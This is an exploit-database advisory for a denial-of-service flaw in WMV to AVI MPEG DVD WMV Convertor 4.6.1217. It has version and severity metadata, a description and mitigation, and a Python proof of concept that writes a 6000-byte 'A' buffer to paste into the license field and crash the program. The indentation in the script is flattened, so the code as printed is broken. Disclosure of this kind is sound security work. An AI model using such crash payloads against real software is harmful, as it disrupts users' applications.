WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service

vendor:

WMV to AVI MPEG DVD WMV Convertor

by:

Nithoshitha S

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: WMV to AVI MPEG DVD WMV Convertor

Affected Version From: 4.6.1217

Affected Version To: 4.6.1217

Patch Exists: Yes

Related CWE: N/A

CPE: a:alloksoft:wmv_to_avi_mpeg_dvd_wmv_convertor

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64, Windows XP SP3

2019

WMV to AVI MPEG DVD WMV Convertor 4.6.1217 – Denial of Service

A denial of service vulnerability exists in WMV to AVI MPEG DVD WMV Convertor 4.6.1217 when a maliciously crafted 'License Name and License Code' is entered into the application. An attacker can exploit this vulnerability by running a python code to create a file containing 6000 bytes of 'A' characters, copying the content of the file to the clipboard, and then pasting it into the 'License Name and License Code' field. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of WMV to AVI MPEG DVD WMV Convertor.

Source

Exploit-DB raw data:

# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Denial of Service
# Date: 2019-10-30
# Vendor Homepage:https://www.alloksoft.com/
# Software Link:  https://www.alloksoft.com/wmv.htm
# Exploit Author: Nithoshitha S
# Tested Version: v4.6.1217
# Tested on: Windows 7 x64
#            Windows XP SP3

# 1.- Run python code :poc.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
# 5.- Click 'OK' and you will see a crash.

# poc.py

#!/usr/bin/env python
buffer = "\x41" * 6000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"